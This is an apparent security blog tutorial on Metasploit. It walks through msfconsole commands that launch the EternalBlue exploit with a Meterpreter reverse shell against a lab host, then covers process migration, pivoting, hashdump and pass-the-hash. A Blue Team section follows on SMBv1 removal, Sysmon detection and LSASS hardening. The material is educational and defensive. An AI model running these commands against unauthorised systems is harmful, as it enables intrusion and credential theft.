Metasploit Framework Fundamentals: From msfconsole to Meterpreter

Tools & Defense
2025.12.29
Time it takes to read this article 6 minutes.

Introduction / Overview

The Metasploit Framework is the most widely used exploitation framework in the industry, and for good reason: it standardizes the entire offensive workflow — reconnaissance, exploitation, payload delivery, and post-exploitation — behind a single, scriptable console. If you can drive msfconsole, you can chain together thousands of exploit, auxiliary, and post modules without writing a line of code.

This article walks through the core concepts every operator needs: navigating msfconsole, using search to find modules, configuring and launching an exploit, working inside a meterpreter session, and running post modules for privilege escalation and collection. We close with a Blue Team section, because everything Metasploit does leaves artifacts — and knowing them is what separates a defender from a victim.

Legal and ethical disclaimer. This material is for education and authorized security testing only. Run these commands exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime under laws such as the U.S. CFAA, the UK Computer Misuse Act, and equivalents worldwide. You are responsible for your own actions.

How It Works / Background

Metasploit is organized into module categories that map directly to phases of an engagement:

  • exploits — code that triggers a vulnerability to gain a foothold.
  • payloads — what runs on the target after the exploit lands (a shell, Meterpreter, etc.).
  • auxiliary — scanners, fuzzers, and non-exploit tooling (no payload).
  • post — modules that run after you have a session (loot, pivot, escalate).
  • encoders / nops / evasion — payload shaping and AV evasion helpers.

Payloads come in two flavors. Staged payloads (e.g. windows/x64/meterpreter/reverse_tcp) send a tiny first-stage stub that pulls the rest over the network; stageless payloads (e.g. windows/x64/meterpreter_reverse_tcp, note the underscore) ship the whole thing at once. Staged payloads are smaller on the wire but noisier in terms of follow-up connections.

Meterpreter is Metasploit's flagship payload: an in-memory, DLL-injection-based agent that communicates over an encrypted, extensible channel. Because it lives in the memory of a host process and rarely touches disk, it defeats naive file-based detection — but it is far from invisible, as we'll see.

Prerequisites / Lab Setup

Use an isolated lab. A typical setup:

  • Attacker: Kali Linux with Metasploit preinstalled.
  • Target: an intentionally vulnerable VM such as Metasploitable 2/3, or a Windows host you control.

Initialize the database (gives you hosts, services, and loot tracking) and launch the console:

# Initialize the PostgreSQL-backed Metasploit database
sudo msfdb init

# Launch the console
msfconsole -q

# Inside msfconsole, confirm DB connectivity
db_status
workspace -a lab01      # create and switch to a clean workspace
Bash

Attack Walkthrough / PoC

1. Recon and importing results

Run a Nmap scan straight into the database so hosts and services are tracked automatically:

# From inside msfconsole
db_nmap -sV -sC 10.10.10.5
hosts
services
Bash

2. Searching for modules

The search command is your map. It supports keyword filters that make a huge module set tractable:

# Free-text
search eternalblue

# Filter by CVE, type, platform, and rank
search cve:2017-0144 type:exploit platform:windows
search type:auxiliary name:smb_version

# Sort by reliability/impact
search rank:excellent type:exploit name:smb
Bash

Results are numbered, so you can select directly with use 0 instead of typing the full path. To inspect a module before committing:

use exploit/windows/smb/ms17_010_eternalblue
info
show options
show targets
show payloads
Bash

3. Configuring and launching an exploit

show options lists the required (yes) and optional settings. Set them with set, and use setg to persist a value globally across modules (handy for LHOST):

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
setg LHOST 10.10.14.7
set LPORT 4444

# Validate that the target is actually vulnerable first
check

# Fire it (use 'exploit -j' to run the handler as a background job)
exploit
Bash

EternalBlue exploits CVE-2017-0144, the SMBv1 flaw patched in Microsoft bulletin MS17-010. A successful run drops you into a Meterpreter session.

4. Driving Meterpreter

# Who am I and where am I?
getuid
sysinfo
 getpid

# Filesystem and search
pwd
ls
search -f *.kdbx

# Network and pivoting
ipconfig
run autoroute -s 10.10.20.0/24     # route traffic to a second subnet through this host

# Move into a stable, long-lived process (note: this is detectable)
ps
migrate -N explorer.exe

# Drop to a system shell, or back to Meterpreter
shell
exit
Bash

To background a session and return to the console, press Ctrl+Z. Manage sessions with sessions -l, and re-enter one with sessions -i 1.

5. Privilege escalation and post modules

post modules act on an existing session. Reference the session with SESSION:

# Background the Meterpreter session first (Ctrl+Z)

# Suggest local privesc exploits based on the host
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# Harvest hashes (requires SYSTEM privileges)
use post/windows/gather/hashdump
set SESSION 1
run

# Enumerate installed software, useful for further targeting
use post/windows/gather/enum_applications
set SESSION 1
run
Bash

From a Meterpreter prompt you can also run many of these inline, e.g. run post/windows/gather/checkvm or hashdump. Once you have credentials or hashes, pass them to lateral-movement modules such as exploit/windows/smb/psexec with SMBPass set to an NTLM hash for a pass-the-hash attack — see Pass-the-Hash explained for the underlying protocol details.

Mermaid Diagram

Metasploit Framework Fundamentals: From msfconsole to Meterpreter diagram 1

Diagram: the Metasploit kill chain — recon feeds module selection, a validated exploit yields an in-memory Meterpreter session, which is then escalated and mined by post modules before pivoting deeper.

Detection & Defense (Blue Team)

Metasploit is loud if you know what to listen for. Detection and mitigation deserve at least as much attention as the offense.

Patch and reduce attack surface. EternalBlue (MS17-010) has been patched since March 2017. Disable SMBv1 entirely — it has no legitimate modern use:

# Disable the SMBv1 protocol (Windows 8.1 / Server 2012 R2+)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# Verify SMBv1 is off on the server side
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
PowerShell

Detect the exploit on the wire. EternalBlue's grooming produces anomalous SMB transactions. Emerging Threats and the community Suricata/Snort rulesets ship signatures for it (e.g. ET EXPLOIT Possible ETERNALBLUE ...). Watch for SMB tree connects to the IPC$ share followed by malformed Trans2 requests.

Detect Meterpreter behavior, not just files. Because Meterpreter is in-memory, focus on behavioral telemetry:

  • Process injection / migration. migrate triggers OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread against a target process. Map this to MITRE ATT&CK T1055 (Process Injection). Sysmon Event ID 8 (CreateRemoteThread) and EID 10 (ProcessAccess) with suspicious granted-access masks (e.g. 0x1F0FFF) are high-fidelity here.
  • Suspicious parent-child chains. A service or spoolsv.exe spawning cmd.exe/powershell.exe (from shell or getsystem's named-pipe impersonation) is anomalous. getsystem notably creates a named pipe; named-pipe impersonation maps to T1134.
  • Default network signatures. Stock Meterpreter handlers, default certificates, and the default callback port 4444 are well-known IOCs. Alert on outbound connections to uncommon high ports from server processes.
  • Credential access. hashdump/smart_hashdump read from the SAM/SECURITY hives or LSASS — map to T1003 (OS Credential Dumping). Enable LSASS protection (RunAsPPL) and Credential Guard; monitor handle requests to lsass.exe.
# Enable LSA protection (RunAsPPL) to harden against credential dumping
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
PowerShell

Hunt query idea. In your EDR/SIEM, alert on any non-lsass process opening a handle to lsass.exe with PROCESS_VM_READ, and on CreateRemoteThread where source and target image paths differ across a privilege boundary. Pair this with the network IOCs above for high-confidence Meterpreter detection. For broader Windows hardening, see Windows logging and Sysmon for blue teams.

Conclusion

Metasploit lowers the barrier to exploitation by giving you a consistent grammar — search, use, set, check, exploit — and a powerful post-exploitation agent in Meterpreter. Mastering the workflow on legitimate targets makes you a faster, more methodical operator. But the same predictability that makes Metasploit easy to use also makes it detectable: default ports, injection patterns, and credential-access behaviors are all signatures a prepared defender will catch. Learn both sides, and patch the things that let EternalBlue work in the first place.

References

Comments

Copied title and URL